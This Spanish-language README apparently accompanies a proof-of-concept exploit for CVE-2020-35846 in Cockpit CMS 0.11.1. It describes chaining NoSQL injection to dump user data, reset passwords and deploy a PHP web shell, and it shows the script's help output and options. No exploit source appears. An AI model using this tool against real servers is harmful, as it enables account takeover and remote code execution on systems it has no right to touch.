
Cockpit CMS 0.11.1 Inyección NoSQL a Ejecución Remota de Código
Cockpit CMS tiene algunas vulnerabilidades NoSQL que pueden usarse para volcar información de usuarios. Estas divulgaciones de información pueden encadenarse para cambiar las contraseñas de los usuarios y conducen a la Ejecución Remota de Código en el servidor.
Una breve descripción de todas estas vulnerabilidades se puede encontrar aquí.
┌─[0z09e]─[~/project/CVE-2020-35846]
└──╼ $ python3 exploit.py --help
usage: exploit.py [-h] [--dump_all] URL
_________ __ .__ __ ___________________ ___________
\_ ___ \ ____ ____ | | ________ |__|/ |_ \______ \_ ___ \_ _____/
/ \ \/ / _ \_/ ___\| |/ /\____ \| \ __\ | _/ \ \/ | ___)
\ \___( <_> ) \___| < | |_> > || | | | \ \____|
\______ /\____/ \___ >__|_ \| __/|__||__| |____|_ /\______ /_______ /
\/ \/ \/|__| \/ \/ \/
Cockpit CMS NoSQL Injection to Remote Code Execution : CVE-2020-35846
POC written by : 0z09e (https://github.com/0z09e)
positional arguments:
URL Target URL. Example : http://10.20.30.40/path/to/cockpit
optional arguments:
-h, --help show this help message and exit
--dump_all Dump all the informations about each and every user.(No password will be changed and no shell will be deployed)
URL - La URL objetivo en la que se ejecuta Cockpit CMS.--dump_all - Vuelca toda la información sobre cada usuario presente en el CMS.Desplegando un PHP-WebShell :

Volcando información de usuarios :
